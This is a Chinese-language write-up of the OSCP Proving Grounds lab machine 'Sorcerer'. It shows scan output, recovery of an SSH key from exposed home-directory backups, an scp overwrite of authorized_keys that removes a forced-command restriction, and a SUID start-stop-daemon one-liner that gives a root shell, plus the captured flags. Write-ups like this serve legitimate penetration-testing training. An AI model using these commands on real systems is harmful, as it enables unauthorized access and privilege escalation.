OSCP - Proving Grounds - Sorcerer

主要知识点

• ls 命令时候，尽量用 -a参数，否则会忽略掉 隐藏目录，类似 .ssh
• authorized_keys文件开头也许有限制信息
• scp命令知识
• 别被得到的tomcat-users.xml.bak迷惑

具体步骤

执行nmap扫描，很多端口开放

Nmap scan report for 192.168.54.100
Host is up (0.00078s latency).
Not shown: 65525 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 81:2a:42:24:b5:90:a1:ce:9b:ac:e7:4e:1d:6d:b4:c6 (RSA)
|   256 d0:73:2a:05:52:7f:89:09:37:76:e3:56:c8:ab:20:99 (ECDSA)
|_  256 3a:2d:de:33:b0:1e:f2:35:0f:8d:c8:d7:8f:f9:e0:0e (ED25519)
80/tcp    open  http     nginx
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100003  3           2049/udp   nfs
|   100003  3,4         2049/tcp   nfs
|   100005  1,2,3      41937/tcp   mountd
|   100005  1,2,3      49155/udp   mountd
|   100021  1,3,4      32993/tcp   nlockmgr
|   100021  1,3,4      59660/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/udp   nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
7742/tcp  open  http     nginx
|_http-title: SORCERER
8080/tcp  open  http     Apache Tomcat 7.0.4
|_http-title: Apache Tomcat/7.0.4
|_http-favicon: Apache Tomcat
32993/tcp open  nlockmgr 1-4 (RPC #100021)
41937/tcp open  mountd   1-3 (RPC #100005)
53819/tcp open  mountd   1-3 (RPC #100005)
54881/tcp open  mountd   1-3 (RPC #100005)

对于http端口进一步执行nikto,发现7742端口下有额外的信息,../zipfiles/

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.54.100
+ Target Hostname:    192.168.54.100
+ Target Port:        7742
+ Start Time:         2024-10-10 22:45:04 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /zipfiles/: Directory indexing found.
+ /zipfiles/: This might be interesting.
+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2024-10-10 22:45:21 (GMT0) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

下载下来后得到4个文件，解压缩后发现是/home 路径的备份

C:\home\kali\Documents\OFFSEC\GoToWork\Sorcerer\zipfiles\192.168.122.100:7742\zipfiles> ls -l 
total 28
-rw-rw-r-- 1 kali kali 2834 Sep 24  2020 francis.zip
-rw-rw-r-- 1 kali kali 8274 Sep 24  2020 max.zip
-rw-rw-r-- 1 kali kali 2826 Sep 24  2020 miriam.zip
-rw-rw-r-- 1 kali kali 2818 Sep 24  2020 sofia.zip

其中max目录下有Tomcat配置信息，一个脚本和ssh keys

C:\home\kali\Documents\OFFSEC\GoToWork\Sorcerer\zipfiles\192.168.122.100:7742\zipfiles\home\max> ls -la
total 40
drwxr-xr-x 3 kali kali 4096 Oct 10 19:44 .
drwxrwxr-x 6 kali kali 4096 Oct 10 19:34 ..
-rw-r--r-- 1 kali kali  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 kali kali 3526 Apr 18  2019 .bashrc
-rw-r--r-- 1 kali kali  807 Apr 18  2019 .profile
-rwxr-xr-x 1 kali kali  133 Sep 24  2020 scp_wrapper.sh
drwxr-xr-x 2 kali kali 4096 Oct 10 19:43 .ssh
-rw-r--r-- 1 kali kali 1991 Sep 24  2020 tomcat-users.xml.bak

尝试用tomcat-users.xml中的密码登录tomcat管理页面，失败，暂时放弃，看起来不允许跨站登录

而scp_wrapper.sh看起来如果输入操作不是scp，则会返回失败信息

利用如下命令进行ssh登录，发现登录失败

ssh -i .ssh/id_rsa [email protected]

查看../max/.ssh/authorized_keys的内容，发现在登录的时候会调用scp_wrapper.sh，也就是如果利用ssh命令登录，则会失败，只允许scp命令

no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty,command="/home/max/scp_wrapper.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC39t1AvYVZKohnLz6x92nX2cuwMyuKs0qUMW9Pa+zpZk2hb/ZsULBKQgFuITVtahJispqfRY+kqF8RK6Tr0vDcCP4jbCjadJ3mfY+G5rsLbGfek3vb9drJkJ0+lBm8/OEhThwWFjkdas2oBJF8xSg4dxS6jC8wsn7lB+L3xSS7A84RnhXXQGGhjGNfG6epPB83yTV5awDQZfupYCAR/f5jrxzI26jM44KsNqb01pyJlFl+KgOs1pCvXviZi0RgCfKeYq56Qo6Z0z29QvCuQ16wr0x42ICTUuR+Tkv8jexROrLzc+AEk+cBbb/WE/bVbSKsrK3xB9Bl9V9uRJT/faMENIypZceiiEBGwAcT5lW551wqctwi2HwIuv12yyLswYv7uSvRQ1KU/j0K4weZOqDOg1U4+klGi1is3HsFKrUZsQUu3Lg5tHkXWthgtlROda2Q33jX3WsV8P3Z4+idriTMvJnt2NwCDEoxpi/HX/2p0G5Pdga1+gXeXFc88+DZyGVg4yW1cdSR/+jTKmnluC8BGk+hokfGbX3fq9BIeiFebGnIy+py1e4k8qtWTLuGjbhIkPS3PJrhgSzw2o6IXombpeWCMnAXPgZ/x/49OKpkHogQUAoSNwgfdhgmzLz06MVgT+ap0To7VsTvBJYdQiv9kmVXtQQoUCAX0b84fazWQQ== max@sorcerer   

于是咱们可以更改authorized_keys文件，删除ssh-rsa字样前的限制条件并利用scp命令覆 remote server中的 同名文件,这里需要使用-O 参数，否则会报错: Received message too long 1094927173

scp -O -i .ssh/id_rsa .ssh/authorized_keys [email protected]:/home/max/.ssh/authorized_keys 

再次使用ssh命令登录,成功

:\home\kali\Documents\OFFSEC\GoToWork\Sorcerer\...\zipfiles\home\max> ssh -i .ssh/id_rsa [email protected]                     
max@sorcerer:~$ id
uid=1003(max) gid=1003(max) groups=1003(max)

上传linpeas.sh并执行，发现，当然find / -type f -perm -4000 2>/dev/null也可以发现

-rwsr-xr-x 1 root root 44K Jun  3  2019 /usr/sbin/start-stop-daemon

参考start stop daemon | GTFOBins，提权成功

max@sorcerer:~$ /usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
# id
uid=1003(max) gid=1003(max) euid=0(root) groups=1003(max)
# cat /root/proof.txt
c5d9ac097f37290dff2c255aa0de581e
# ls /home 
dennis  francis  max  miriam  sofia
# ls /home/dennis
local.txt
# cat /home/dennis/local.txt
58d6d9c65fe6da709abadf69db928e73
#